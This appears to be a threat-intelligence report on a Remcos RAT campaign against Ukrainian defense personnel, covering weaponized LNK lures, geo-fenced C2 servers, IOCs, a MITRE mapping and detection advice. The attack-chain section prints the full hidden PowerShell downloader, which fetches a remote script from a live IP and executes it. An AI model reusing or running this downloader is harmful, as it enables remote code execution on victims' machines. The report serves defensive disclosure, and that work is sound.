Operation MAYNA HARVEST: Remcos RAT Targets Ukrainian Ministry of Defense via Geo-Fenced PowerShell Chain
title: "Operation MAYNA HARVEST: Russian-Aligned Campaign Deploys Remcos RAT Against Ukrainian Ministry of Defense Through Geo-Fenced PowerShell Downloaders" subtitle: "Three C2 servers across three countries, six LNK files with identical PowerShell templates, and a RIPE WHOIS record that exposes the hosting operator -- a 3-week campaign targeting Ukrainian military property management personnel" tags: ["Remcos", "Ukraine", "UAC-0184", "APT", "LNK", "PowerShell", "geo-fencing", "spearphishing", "Russia"]
Operation MAYNA HARVEST: Remcos RAT Targets Ukrainian Ministry of Defense via Geo-Fenced PowerShell Chain
The filenames tell the story. "Nakaz_MO_perevirka_mayna" -- Ministry of Defense Order, property check. "Spysok_mayna" -- property list. "Vtrata mayna PETROVSKYI" -- property loss by Petrovskyi. "Dopovid_maino" -- property report. Every lure document references Ukrainian military asset management procedures, and every one of them is a weaponized LNK file that downloads Remcos RAT through a geo-fenced PowerShell chain.
This campaign has been active since at least February 19, 2026. We have mapped three distinct C2 servers across three countries (Netherlands, Czech Republic, United Kingdom), six malicious LNK files, and five unique PowerShell payload URLs. The C2 servers return HTTP 403 to non-Ukrainian IP addresses -- payload delivery is restricted to the target country.
The infrastructure traces to bulletproof hosting networks including DGTLS-MNT, with a RIPE WHOIS record that exposes "Nikita Sibul" in Belgrade, Serbia, as the admin contact for one of the C2 hosting providers.
Key Findings
- 3 C2 servers rotating on ~2-week intervals, all running Apache on Ubuntu
- 6 malicious LNK files with identical PowerShell downloader templates
- Geo-fencing active: Non-Ukrainian IPs receive HTTP 403 Forbidden on all C2 servers
- Remcos RAT confirmed as final payload via ThreatFox (C2:
46[.]28[.]70[.]102:1654) - Campaign active since February 19, 2026 with infrastructure rotation across waves
- UAC-0184 attribution (HIGH confidence) based on tradecraft overlap with CERT-UA advisories
- OPSEC failure: RIPE WHOIS exposes Nikita Sibul (Belgrade, Serbia) as admin contact for Kraken Network ISP (AS209274)
- Bulletproof hosting: DGTLS-MNT (known BPH), InterlIR-brokered IP space, shell company registered in UK
The Attack Chain
A victim in a Ukrainian MoD office receives an email with a ZIP archive. Inside are two LNK files using the double-extension trick: .docx.lnk appears as .docx with Windows default settings. When clicked:
powershell.exe -w Hidden
$r = New-Object -ComObject 'WinHttp.WinHttpRequest.5.1'
$r.Open('GET', 'http://80.71.224.185/kakrarg/sneakerassembly.ps1', $false)
$r.SetRequestHeader('User-Agent', 'UA WindowsPowerShell')
$r.Send()
. ([ScriptBlock]::Create($r.ResponseText))
C:\Program Files\Microsoft Office\root\Office16\WINWORD.exe
The PowerShell runs hidden, downloads the second stage via WinHttp COM object (evading PowerShell module logging), executes it via ScriptBlock::Create, and opens Microsoft Word as a decoy so the user thinks their "document" opened normally.
Campaign Waves
| Wave | Date | ZIP/LNK | C2 | URL Path |
|---|---|---|---|---|
| Wave 1 | Feb 19 | Vtrata mayna PETROVSKYI.zip | 195[.]10[.]205[.]65 | /kkraag/ |
| Wave 2 | Mar 5 | Dopovid_maino_09.01.pdf.lnk | 46[.]28[.]70[.]102 | /sp11rt4m/ |
| Wave 3 | Mar 10 | Nakaz_MO_perevirka_mayna.zip | 80[.]71[.]224[.]185 | /kakrarg/ |
The PS1 filenames follow a pattern: two random English words concatenated (sneakerassembly, buckwheatsociology, golfproceedings, tactilelivestock, puppetsafeguard, slappicnic). This strongly suggests an automated builder tool.
Infrastructure
| IP | Provider | Country | Role | Status |
|---|---|---|---|---|
80[.]71[.]224[.]185 | Kraken Network ISP (AS209274) | UK | PS1 staging (Wave 3) | LIVE (403) |
195[.]10[.]205[.]65 | Partner Hosting / ALTAWK | Netherlands | PS1 staging (Wave 1) | LIVE |
46[.]28[.]70[.]102 | ITLDC / GreenFloid | Czech Republic | PS1 staging + Remcos C2 (port 1654) | LIVE |
Kraken Network ISP (AS209274) is a shell company: UK registration, Serbian operator (Nikita Sibul, Belgrade), ASN created May 2025, IP block allocated December 2025. The adjacent /24 hosts a full mail server on .178 (possible phishing relay), RDP on .187, and Express/Node.js apps -- a functioning BPH block.
Partner Hosting references DGTLS-MNT in RIPE records -- a maintainer associated with bulletproof hosting operations.
IOCs
C2 Servers:
80[.]71[.]224[.]185 # Kraken Network ISP, UK (Wave 3)
195[.]10[.]205[.]65 # Partner Hosting, NL (Wave 1)
46[.]28[.]70[.]102 # ITLDC/GreenFloid, CZ (Waves 2 + Remcos C2)
46[.]28[.]70[.]102:1654 # Remcos RAT C2
Payload URLs:
hxxp://80[.]71[.]224[.]185/kakrarg/sneakerassembly.ps1
hxxp://80[.]71[.]224[.]185/kakrarg/buckwheatsociology.ps1
hxxp://195[.]10[.]205[.]65/kkraag/golfproceedings.ps1
hxxp://195[.]10[.]205[.]65/kkraag/tactilelivestock.ps1
hxxp://46[.]28[.]70[.]102/sp11rt4m/puppetsafeguard.ps1
File Hashes:
| SHA256 | File |
|---|---|
a21094a7fd28bdb11165a341441dc223aa1c4fc02b3c87f7cbd22dfa6dc43b43 | Nakaz_MO_perevirka_mayna.zip |
ec7f0d5da376591878b9bcd908e06e7d0e90176ecd99e41577167e29e47d40e4 | Nakaz_MO_perevirka_mayna.docx.lnk |
5c39fda25f7a93c3ad69628e939b5e62968a86c6f10b3792f2fadae2235cc9ac | Spysok_mayna.docx.lnk |
14cfadb8c0154dc1174b0b9af74765f769fad524d17eb2ec494ce02c9a221c8d | Dopovid_maino_09.01.pdf.lnk |
Behavioral:
- Custom User-Agent:
UA WindowsPowerShell - COM Object:
WinHttp.WinHttpRequest.5.1 - Decoy Process:
WINWORD.exe
MITRE ATT&CK
| Technique | ID | Application |
|---|---|---|
| Spearphishing Attachment | T1566.001 | ZIP with weaponized LNK files |
| PowerShell | T1059.001 | Hidden PowerShell downloader |
| Double File Extension | T1036.007 | .docx.lnk appears as .docx |
| Hidden Window | T1564.003 | PowerShell -w Hidden |
| Non-Standard Port | T1571 | Remcos C2 on port 1654 |
| Ingress Tool Transfer | T1105 | PowerShell downloads second stage |
| Query Registry | T1012 | Country code verification |
Conclusion
Three weeks, three C2 servers, three countries, one persistent objective: intelligence collection against Ukrainian Ministry of Defense personnel responsible for military property management. The tradecraft is consistent with UAC-0184 -- LNK delivery, PowerShell downloader chains, Remcos RAT, military-themed lures, geo-fenced C2 infrastructure. The operator's use of bulletproof hosting (DGTLS-MNT, InterlIR-brokered Kraken ISP) and infrastructure rotation shows operational discipline, but the identical PowerShell template and reused lure filenames provide reliable detection anchors. Block the three C2 IPs, hunt for the UA WindowsPowerShell user-agent string in proxy logs, and enable "Show file extensions" on every managed endpoint -- that single Group Policy change makes the double-extension trick visible to every user.